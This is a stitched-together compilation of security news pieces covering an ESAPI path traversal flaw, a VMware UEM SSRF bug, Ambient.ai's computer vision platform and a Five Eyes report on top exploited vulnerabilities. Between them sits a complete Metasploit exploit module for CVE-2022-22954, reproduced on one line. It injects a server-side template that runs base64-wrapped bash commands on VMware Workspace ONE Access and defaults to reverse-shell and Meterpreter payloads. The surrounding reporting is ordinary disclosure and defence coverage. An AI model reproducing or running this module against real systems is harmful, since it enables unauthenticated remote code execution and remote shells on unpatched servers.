Wall added: “Even when that is used within an application, that still does not mean that it is exploitable within your application itself. You really have to analyze it on a case-by-case basis.”

Read more of the latest secure development news

According to Wall, in most use cases the vulnerable ESAPI would be used in conjunction with a web application firewall (WAF) or intrusion Detection software – factors further limiting the scope for harm.

On the question of severity, the software developer concluded: “I don’t think this is really a ‘high’ vulnerability, but that’s what we go have with because that’s what CVSSv3.1 spits out.”

**Lessons to learn**

While the vulnerability in play is unlikely to be exploited, and even less likely to cause much harm, the bug offers lessons for software developers, according to Wall.

For one thing, application developers using libraries should use a software composition analysis (SCA) tool and know its limits.

“Some SCA tools only find vulnerabilities reported in direct dependencies, but not in transitive dependencies,” Wall explained.

“And if you decide not to patch, then you need to do a deep-dive analysis to see exactly how the vulnerability in some library impacts your application and what types of mitigating controls you can put up (e.g., maybe ‘virtual patching’ via a WAF) to reduce the risk.”

**DON’T FORGET TO READ** NPM developer reputations could be leveraged to legitimize malicious software

The flaw may also be instructive for library developers because it illustrates the utility of static application security testing (SAST) tools.

“For library developers, run SAST tools of some sort and review the results, but also try to have adequate test coverage and at least do manual code reviews of the ‘git diffs’ when PRs are submitted but before they are merged,” Wall advised.

Although coding mistakes made in developing ESAPI led to the flaw, these were understandable mistakes, according to Wall.

He concluded: “I think the place where ESAPI dropped the ball is that there was no specific test that would have brought this to our attention and that’s on us, although I think in our defense, it was mostly the unawareness of everyone who previously touched that code that acts differently when a value for a directory is not ‘/’ terminated. I think that’s a bit unintuitive.”

**RECOMMENDED** Security bug in VMWare Workspace ONE could allow access to internal, cloud networks

Path traversal flaw found in OWASP enterprise library of security controls

This Metasploit module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) vulnerability in VMware Workspace ONE Access, to execute shell commands as the horizon user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware Workspace ONE Access CVE-2022-22954',        'Description' => %q{          This module exploits CVE-2022-22954, an unauthenticated server-side          template injection (SSTI) in VMware Workspace ONE Access, to execute          shell commands as the "horizon" user.        },        'Author' => [          'mr_me', # Discovery          'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC          'wvu' # Exploit and independent analysis        ],        'References' => [          ['CVE', '2022-22954'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],          ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],          ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],          ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']          # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433        ],        'DisclosureDate' => '2022-04-06',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    ret = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")    return CheckCode::Unknown unless ret    return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)    CheckCode::Vulnerable  end  def exploit    print_status("Executing #{payload_instance.refname} (#{target.name})")    case target['Type']    when :cmd      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  end  def execute_command(cmd, _opts = {})    bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}"    vprint_status("Executing command: #{bash_cmd}")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, ssti_uri),      'vhost' => rand_text_alphanumeric(8..16),      'vars_get' => {        %w[code error].sample => rand_text_alphanumeric(8..16),        # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html        ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})      }    }, 3.5)    return unless res    return '' unless res.code == 400 && res.body.include?('auth.context.invalid')    res.body  end  def ssti_uri    %w[      /catalog-portal/hub-ui      /catalog-portal/hub-ui/byob      /catalog-portal/ui      /catalog-portal/ui/oauth/verify    ].sample  end  def ssti_param    %w[deviceType deviceUdid].sample  endend

VMware Workspace ONE Access Template Injection / Command Execution

Users should patch immediately

A security vulnerability in a mobile device management software could allow attackers access to organizations’ internal and cloud networks, researchers warn.

Discovered by Assetnote, the server-side request forgery (SSRF) bug was found in VMWare Workspace One UEM.

Tracked as CVE-2021-22054, the vulnerability could risk credentials and other sensitive data falling into the hands of malicious attackers.

Read more of the latest news about security vulnerabilities

“We discovered a pre-authentication vulnerability that allowed us to make arbitrary HTTP requests, including requests with any HTTP method and request body,” the researchers wrote in a blog post.

“In order to exploit this SSRF, we had to reverse engineer the encryption algorithm used by VMWare Workspace One UEM.”

The team were able to breach “a number of” organizations using the software, accessing both their internal network and cloud services.

DON’T MISS VirusTotal debunks claims of a serious vulnerability in Google-owned antivirus service

Speaking to The Daily Swig, Assetnote’s Subham Shah said: “While I cannot share exact details about what companies were effected, there were a large number of enterprises that were vulnerable to this.

“In some cases, it was possible to use this vulnerability to breach the AWS accounts of the companies.”

Shah added: “The impact of this vulnerability is rather on the organization running the software, instead of the individual users that are using the products.

“Using the SSRF vulnerability, it is possible to reach arbitrary hosts on the internal network. On cloud networks such as AWS, it is possible to reach the metadata IP address and potentially steal security credentials.

“Using these security credentials, it is possible to escalate the vulnerability to gain access to other infrastructure belonging to a company.”

**Remediations**

The issue, which was first discovered in November 2021, has since been patched by the vendor.

Shah said that while VMware dealt with the issues “in a timely manner”, researchers agreed to the vendor’s request for more time to release more patches and allow customers to patch their instances before disclosure.

An advisory from VMWare contains details of fixes for the software.

Shah advised users of mobile management device software “if possible, do not expose the MDM solution to the external internet”.

YOU MAY ALSO LIKE IBM database updates address critical vulnerabilities in third-party XML parser

Security bug in VMWare Workspace ONE could allow access to internal, cloud networks

The AI startup releases new threat signatures to expand the computer vision platform’s ability to identify potential physical security incidents from camera feeds.

A comprehensive cybersecurity strategy should include physical security. Adversaries don't need to worry about compromising a corporate device or breaching the network if they can just walk into the office and connect directly into the network.

CISOs are increasingly including physical security as part of their strategic investments, says Stephanie McReynolds, head of marketing at Ambient.ai. Organizations are spending a lot of money and effort to lock down cybersecurity, but all of those security controls are useless if the adversary can just enter a restricted space and leave with equipment.

"The last mile of cybersecurity is physical location," McReynolds says.

Ambient.ai uses computer vision technology to solve physical security problems, such as monitoring who is entering the building or a restricted area and monitoring all the video feeds coming from the camera network. Computer vision is a subcategory of artificial intelligence dealing with how computers can process images and videos and derive an understanding of what they are seeing. The idea behind computer vision is to provide computers with eyes to see the same things humans see, and training the algorithm to think about what the eyes saw.

In the case of Ambient.ai, the company's computer vision intelligence platform serves as "the brain" behind physical access control systems, such as security cameras and physical sensors (such as door locks and entry pads). This week, the company expanded the catalog of behaviors the computer vision platform can recognize with 25 threat signatures.

**Computers Help Humans See**  
Traditionally, physical security involves staff in the security center monitoring alerts from the sensors and watching video feeds to try to detect when something untoward is happening. They may receive alerts that a door is open, or that a person swiped the access card to get into the building after-hours. There might be camera footage of someone loitering for quite some time in the building lobby, or a person entering a restricted area carrying an unauthorized laptop. Humans are expected to detect and respond to security incidents, but between fatigue and too much information to process, things can get missed.

"One individual is trying to watch 50 camera feeds at once. This doesn't work," McReynolds notes.

There have been three waves in computer vision, McReynolds says. The first wave was basic detection — that there was an object there, but no insight into what it was. The second wave added recognition, so it knew what it was looking at, such as whether it was a person or a dog. But it was a limited form of recognition, and there was a lot that was still unknown about the object it was looking at. The third wave, the current one, takes in context clues from the broader scene to understand what is happening. Just as a human would look at details around the object to understand what is happening, such as whether the person is sitting or if the person is outside, computer vision technology is now capable of collecting those details.

Ambient.ai breaks down the image or video into "primitives" — which refers to components such as interactions, locations, and objects seen — and constructs a signature to understand what is happening. A signature may be something like a person standing in the lobby for a long time not interacting with anyone, for example.

The new threat signatures expand the platform's ability to catalog over 100 behaviors, McReynolds says.

**Recognizing What Is an Incident**  
The Ambient.ai Context Graph assesses three risk factors to determine next steps: the context of the location, the movements that create behavior signatures, and the type of objects interacting in a scene. Based on these factors, the platform can dispatch security personnel to handle the incident, validate risks, or trigger proactive alerts. With the Context Graph, analysts can also tell which alerts are not security incidents, such as a door that didn't latch properly, and close the ones that don't require any action.

"A person holding a knife running in the kitchen isn't a security incident," McReynolds says. "A person holding a knife running in the lobby, on the other hand, is a security incident."

VMware, an Ambient.ai customer, claims that 93% of its alerts each year were false positives. By integrating Ambient.ai's platform with its physical access control systems, VMware's security teams didn't have to deal with those alerts and were able to focus their attention on dealing with the remaining 7% of alerts to stop security incidents on its campus.

McReynolds described a potential workplace violence scenario, where a former employee tried to use their badge to enter the building. The invalid badge in and of itself is not a security threat, but paired with security footage of the former employees sitting in the lobby and not interacting with anyone, there are enough reasons to be concerned. The alert would then be prioritized to send a guard to approach the individual.

"Sometimes it takes just a conversation and the person will stand down," McReynolds says.

All that is accomplished without resorting to facial recognition, which brings a host of privacy implications. Ambient.ai uses machine learning, pattern-matching, and computer vision to make decisions about what is important.

**Computer Vision in Security**  
Computer vision technology is useful in several security contexts because it can be used to detect manipulations that are less visible to the human eye, says Fernando Montenegro, senior principal analyst at Omdia. For example, the technology can be used to identify spoofed logos and websites used in account takeovers and ecommerce fraud. Another interesting use case is to represent binary samples as images, and then using imaging classification techniques to classify them as malicious or not, he says.

One aspect of computer vision is the capability to analyze "datasets that are not originally 'images' themselves, but can be encoded as such," Montenegro says.

Humans have the capacity to say something doesn't look right, even if they can't specifically point to something that is wrong, says Gunter Ollmann, CSO of Devo. An intriguing application of computer vision research is to train the algorithm to be able to detect something is wrong because of the way it looks, he says. By turning source code into an image, the machine can analyze the structure and other patterns to detect potential issues without having to analyze the code line by line. This kind of analysis can be used for malware analysis, by color-coding different categories of function and analyzing the image to get an understanding of what the application is doing.

There are several computer vision startups tackling cybersecurity issues. Hummingbirds AI uses facial biometrics to authenticate users and grant access to the device. When the computer "sees" a person who is not authorized that is close to the screen, the tool blocks access. Pixm relies on computer vision to identify and stop spear-phishing attacks. The platform runs in the browser window and is available from the moment the user clicks on a link until the campaign is disrupted.

"We are now in an exciting era where \[the machine\] can collaborate with the human," Ambient.ai's McReynolds says, regarding advancements in computer vision.

Ambient.ai Expands Computer Vision Capabilities for Better Building Security

Log4Shell, ProxyShell, ProxyLogon, ZeroLogon, and flaws in Zoho ManageEngine AD SelfService Plus, Atlassian Confluence, and VMware vSphere Client emerged as some of the top exploited security vulnerabilities in 2021.

That's according to a "Top Routinely Exploited Vulnerabilities" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand

Log4Shell, ProxyShell, ProxyLogon, ZeroLogon, and flaws in Zoho ManageEngine AD SelfService Plus, Atlassian Confluence, and VMware vSphere Client emerged as some of the top exploited security vulnerabilities in 2021.

That's according to a "Top Routinely Exploited Vulnerabilities" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.

Other frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server (CVE-2020-0688), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure (CVE-2019-11510), and a path traversal defect in Fortinet FortiOS and FortiProxy (CVE-2018-13379).

Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.

"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities," the agencies said in a joint advisory.

"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors."

To mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vmware